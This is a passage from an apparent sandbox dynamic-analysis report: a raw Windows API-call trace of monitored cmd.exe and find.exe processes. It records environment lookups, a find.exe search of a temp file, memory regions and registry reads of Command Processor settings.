(_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0034.849] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0034.849] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0034.849] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0034.849] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0034.849] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0034.849] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0034.849] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0034.849] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0034.849] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0034.849] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0034.849] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0034.849] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0034.849] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0034.849] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0034.849] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0034.849] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0034.849] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0034.850] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0034.850] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0034.850] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0034.850] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0034.850] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0034.850] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0034.850] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0034.850] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0034.850] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0034.850] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0034.850] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0034.850] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0034.850] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0034.850] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0034.850] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0034.850] lstrcmpW (lpString1="\\find.exe", lpString2="\\XCOPY.EXE") returned -1 [0034.851] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\find.exe", lpCommandLine="find \"e\" \"C:\\FRS_TEMP\\temp.txt\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0x53f4a8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="find \"e\" \"C:\\FRS_TEMP\\temp.txt\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x53f4f4 | out: lpCommandLine="find \"e\" \"C:\\FRS_TEMP\\temp.txt\"", lpProcessInformation=0x53f4f4*(hProcess=0x58, hThread=0x54, dwProcessId=0xadc, dwThreadId=0xaec)) returned 1 [0034.964] CloseHandle (hObject=0x54) returned 1 [0034.964] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0034.964] GetEnvironmentStringsW () returned 0x7d4278* [0034.964] FreeEnvironmentStringsA (penv="=") returned 1 [0034.964] WaitForSingleObject (hHandle=0x58, dwMilliseconds=0xffffffff) returned 0x0 [0035.113] GetExitCodeProcess (in: hProcess=0x58, lpExitCode=0x53f48c | out: lpExitCode=0x53f48c*=0x1) returned 1 [0035.114] CloseHandle (hObject=0x58) returned 1 [0035.114] _vsnwprintf (in: _Buffer=0x53f574, _BufferCount=0x13, _Format="%08X", _ArgList=0x53f494 | out: _Buffer="00000001") returned 8 [0035.114] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0035.114] GetEnvironmentStringsW () returned 0x7d7e30* [0035.114] FreeEnvironmentStringsA (penv="=") returned 1 [0035.114] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0035.114] GetEnvironmentStringsW () returned 0x7d7e30* [0035.114] FreeEnvironmentStringsA (penv="=") returned 1 [0035.114] DeleteProcThreadAttributeList (in: lpAttributeList=0x53f520 | out: lpAttributeList=0x53f520) [0035.114] _get_osfhandle (_FileHandle=1) returned 0x8c [0035.114] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x0) returned 0 [0035.114] _get_osfhandle (_FileHandle=1) returned 0x8c [0035.114] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0035.114] _get_osfhandle (_FileHandle=0) returned 0x24 [0035.114] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0035.115] SetConsoleInputExeNameW () returned 0x1 [0035.115] GetConsoleOutputCP () returned 0x1b5 [0035.115] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0035.115] SetThreadUILanguage (LangId=0x0) returned 0x409 [0035.116] exit (_Code=1) Process: id = "5" image_name = "find.exe" filename = "c:\\windows\\syswow64\\find.exe" page_root = "0x1046c000" os_pid = "0xadc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0xabc" cmd_line = "find \"e\" \"C:\\FRS_TEMP\\temp.txt\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 327 start_va = 0xcc0000 end_va = 0xcdffff entry_point = 0x0 region_type = private name = "private_0x0000000000cc0000" filename = "" Region: id = 328 start_va = 0xce0000 end_va = 0xce1fff entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 329 start_va = 0xcf0000 end_va = 0xcfefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cf0000" filename = "" Region: id = 330 start_va = 0xd00000 end_va = 0xd3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 331 start_va = 0xd40000 end_va = 0xd7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d40000" filename = "" Region: id = 332 start_va = 0xd80000 end_va = 0xd83fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d80000" filename = "" Region: id = 333 start_va = 0xd90000 end_va = 0xd90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d90000" filename = "" Region: id = 334 start_va = 0xda0000 end_va = 0xda1fff entry_point = 0x0 region_type = private name = "private_0x0000000000da0000" filename = "" Region: id = 335 start_va = 0x11c0000 end_va = 0x11c6fff entry_point = 0x11c0000 region_type = mapped_file name = "find.exe" filename = "\\Windows\\SysWOW64\\find.exe" (normalized: "c:\\windows\\syswow64\\find.exe") Region: id = 336 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 337 start_va = 0x7f180000 end_va = 0x7f1a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f180000" filename = "" Region: id = 338 start_va = 0x7f1a4000 end_va = 0x7f1a4fff entry_point = 0x0 region_type = private name = "private_0x000000007f1a4000" filename = "" Region: id = 339 start_va = 0x7f1a7000 end_va = 0x7f1a7fff entry_point = 0x0 region_type = private name = "private_0x000000007f1a7000" filename = "" Region: id = 340 start_va = 0x7f1ad000 end_va = 0x7f1affff entry_point = 0x0 region_type = private name = "private_0x000000007f1ad000" filename = "" Region: id = 341 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 342 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 343 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 344 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 345 start_va = 0xf40000 end_va = 0xf4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f40000" filename = "" Region: id = 346 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 347 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 348 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 349 start_va = 0xcc0000 end_va = 0xccffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cc0000" filename = "" Region: id = 350 start_va = 0xdb0000 end_va = 0xe2dfff entry_point = 0xdb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 351 start_va = 0xff0000 end_va = 0x10effff entry_point = 0x0 region_type = private name = "private_0x0000000000ff0000" filename = "" Region: id = 352 start_va = 0x747f0000 end_va = 0x74810fff entry_point = 0x747f0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\SysWOW64\\ulib.dll" (normalized: "c:\\windows\\syswow64\\ulib.dll") Region: id = 353 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 354 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 355 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 356 start_va = 0x7f080000 end_va = 0x7f17ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f080000" filename = "" Region: id = 357 start_va = 0xcd0000 end_va = 0xcd3fff entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 358 start_va = 0xce0000 end_va = 0xce3fff entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 359 start_va = 0x1330000 end_va = 0x133ffff entry_point = 0x0 region_type = private name = "private_0x0000000001330000" filename = "" Region: id = 360 start_va = 0x747e0000 end_va = 0x747eefff entry_point = 0x747e0000 region_type = mapped_file name = "fsutilext.dll" filename = "\\Windows\\SysWOW64\\fsutilext.dll" (normalized: "c:\\windows\\syswow64\\fsutilext.dll") Thread: id = 7 os_tid = 0xaec Process: id = "6" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x11a81000" os_pid = "0x3d4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 364 start_va = 0x8c0000 end_va = 0x8dffff entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 365 start_va = 0x8e0000 end_va = 0x8e1fff entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 366 start_va = 0x8f0000 end_va = 0x8fefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 367 start_va = 0x900000 end_va = 0x93ffff entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 368 start_va = 0x940000 end_va = 0xa3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000940000" filename = "" Region: id = 369 start_va = 0xa40000 end_va = 0xa43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a40000" filename = "" Region: id = 370 start_va = 0xa50000 end_va = 0xa50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a50000" filename = "" Region: id = 371 start_va = 0xa60000 end_va = 0xa61fff entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 372 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 373 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 374 start_va = 0x7eee0000 end_va = 0x7ef02fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eee0000" filename = "" Region: id = 375 start_va = 0x7ef06000 end_va = 0x7ef06fff entry_point = 0x0 region_type = private name = "private_0x000000007ef06000" filename = "" Region: id = 376 start_va = 0x7ef0c000 end_va = 0x7ef0efff entry_point = 0x0 region_type = private name = "private_0x000000007ef0c000" filename = "" Region: id = 377 start_va = 0x7ef0f000 end_va = 0x7ef0ffff entry_point = 0x0 region_type = private name = "private_0x000000007ef0f000" filename = "" Region: id = 378 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 379 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 380 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 381 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 382 start_va = 0xbf0000 end_va = 0xbfffff entry_point = 0x0 region_type = private name = "private_0x0000000000bf0000" filename = "" Region: id = 383 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 384 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 385 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 408 start_va = 0x8c0000 end_va = 0x8cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 409 start_va = 0xa70000 end_va = 0xaedfff entry_point = 0xa70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 410 start_va = 0xb90000 end_va = 0xb9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b90000" filename = "" Region: id = 411 start_va = 0xdc0000 end_va = 0xebffff entry_point = 0x0 region_type = private name = "private_0x0000000000dc0000" filename = "" Region: id = 412 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 413 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 414 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 415 start_va = 0x7ede0000 end_va = 0x7eedffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ede0000" filename = "" Region: id = 429 start_va = 0x8d0000 end_va = 0x8d3fff entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Thread: id = 8 os_tid = 0xafc [0035.373] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0035.373] __set_app_type (_Type=0x1) [0035.373] __p__fmode () returned 0x76ea1768 [0035.373] __p__commode () returned 0x76ea176c [0035.373] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0035.373] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0035.373] GetCurrentThreadId () returned 0xafc [0035.373] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xafc) returned 0x30 [0035.373] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0035.373] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0035.374] SetThreadUILanguage (LangId=0x0) returned 0x409 [0035.380] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0035.380] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0xa3fe84 | out: phkResult=0xa3fe84*=0x0) returned 0x2 [0035.380] VirtualQuery (in: lpAddress=0xa3fe93, lpBuffer=0xa3fe2c, dwLength=0x1c | out: lpBuffer=0xa3fe2c*(BaseAddress=0xa3f000, AllocationBase=0x940000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0035.380] VirtualQuery (in: lpAddress=0x940000, lpBuffer=0xa3fe2c, dwLength=0x1c | out: lpBuffer=0xa3fe2c*(BaseAddress=0x940000, AllocationBase=0x940000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0035.380] VirtualQuery (in: lpAddress=0x941000, lpBuffer=0xa3fe2c, dwLength=0x1c | out: lpBuffer=0xa3fe2c*(BaseAddress=0x941000, AllocationBase=0x940000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0035.380] VirtualQuery (in: lpAddress=0x943000, lpBuffer=0xa3fe2c, dwLength=0x1c | out: lpBuffer=0xa3fe2c*(BaseAddress=0x943000, AllocationBase=0x940000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0035.380] VirtualQuery (in: lpAddress=0xa40000, lpBuffer=0xa3fe2c, dwLength=0x1c | out: lpBuffer=0xa3fe2c*(BaseAddress=0xa40000, AllocationBase=0xa40000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0035.380] GetConsoleOutputCP () returned 0x1b5 [0035.381] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0035.381] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0035.381] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.381] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x0) returned 0 [0035.381] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.381] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0035.381] _get_osfhandle (_FileHandle=0) returned 0x24 [0035.381] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0035.383] GetEnvironmentStringsW () returned 0xdc4058* [0035.383] FreeEnvironmentStringsA (penv="=") returned 1 [0035.383] GetEnvironmentStringsW () returned 0xdc4058* [0035.383] FreeEnvironmentStringsA (penv="=") returned 1 [0035.383] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xa3edd4 | out: phkResult=0xa3edd4*=0x40) returned 0x0 [0035.383] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xa3eddc, lpData=0xa3ede0, lpcbData=0xa3edd8*=0x1000 | out: lpType=0xa3eddc*=0x0, lpData=0xa3ede0*=0x0, lpcbData=0xa3edd8*=0x1000) returned 0x2 [0035.383] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xa3eddc, lpData=0xa3ede0, lpcbData=0xa3edd8*=0x1000 | out: lpType=0xa3eddc*=0x4, lpData=0xa3ede0*=0x1, lpcbData=0xa3edd8*=0x4) returned 0x0 [0035.383] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xa3eddc, lpData=0xa3ede0, lpcbData=0xa3edd8*=0x1000 | out: lpType=0xa3eddc*=0x0, lpData=0xa3ede0*=0x1, lpcbData=0xa3edd8*=0x1000) returned 0x2 [0035.383] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xa3eddc, lpData=0xa3ede0, lpcbData=0xa3edd8*=0x1000 | out: lpType=0xa3eddc*=0x4, lpData=0xa3ede0*=0x0, lpcbData=0xa3edd8*=0x4) returned 0x0 [0035.383] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xa3eddc, lpData=0xa3ede0, lpcbData=0xa3edd8*=0x1000 | out: lpType=0xa3eddc*=0x4, lpData=0xa3ede0*=0x40, lpcbData=0xa3edd8*=0x4) returned 0x0 [0035.383] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xa3eddc, lpData=0xa3ede0, lpcbData=0xa3edd8*=0x1000 | out: lpType=0xa3eddc*=0x4, lpData=0xa3ede0*=0x40, lpcbData=0xa3edd8*=0x4) returned 0x0 [0035.383] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0xa3eddc, lpData=0xa3ede0, lpcbData=0xa3edd8*=0x1000 | out: lpType=0xa3eddc*=0x0, lpData=0xa3ede0*=0x40, lpcbData=0xa3edd8*=0x1000) returned 0x2 [0035.383] RegCloseKey (hKey=0x40) returned 0x0 [0035.383] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xa3edd4 | out: phkResult=0xa3edd4*=0x40) returned 0x0 [0035.383] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xa3eddc, lpData=0xa3ede0, lpcbData=0xa3edd8*=0x1000 | out: lpType=0xa3eddc*=0x0, lpData=0xa3ede0*=0x40, lpcbData=0xa3edd8*=0x1000) returned 0x2 [0035.383] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xa3eddc, lpData=0xa3ede0, lpcbData=0xa3edd8*=0x1000 | out: lpType=0xa3eddc*=0x4, lpData=0xa3ede0*=0x1, lpcbData=0xa3edd8*=0x4) returned 0x0 [0035.383] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xa3eddc, lpData=0xa3ede0, lpcbData=0xa3edd8*=0x1000 | out: lpType=0xa3eddc*=0x0, lpData=0xa3ede0*=0x1, lpcbData=0xa3edd8*=0x1000) returned 0x2 [0035.383] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xa3eddc, lpData=0xa3ede0, lpcbData=0xa3edd8*=0x1000 | out: lpType=0xa3eddc*=0x4, lpData=0xa3ede0*=0x0, lpcbData=0xa3edd8*=0x4) returned 0x0 [0035.384] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xa3eddc, lpData=0xa3ede0, lpcbData=0xa3edd8*=0x1000 | out: lpType=0xa3eddc*=0x4, lpData=0xa3ede0*=0x9, lpcbData=0xa3edd8*=0x4) returned 0x0 [0035.384] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xa3eddc, lpData=0xa3ede0, lpcbData=0xa3edd8*=0x1000 | out: lpType=0xa3eddc*=0x4, lpData=0xa3ede0*=0x9, lpcbData=0xa3edd8*=0x4) returned 0x0 [0035.384] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0xa3eddc, lpData=0xa3ede0, lpcbData=0xa3edd8*=0x1000 | out: lpType=0xa3eddc*=0x0, lpData=0xa3ede0*=0x9, lpcbData=0xa3edd8*=0x1000) returned 0x2 [0035.384] RegCloseKey (hKey=0x40) returned 0x0 [0035.384] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa5004e [0035.384] srand (_Seed=0x5aa5004e) [0035.384] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"" [0035.384] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"" [0035.384] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0035.384] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xdc4060, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0035.384] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0035.384] GetEnvironmentVariableW (in: lpName="PATHEXT", 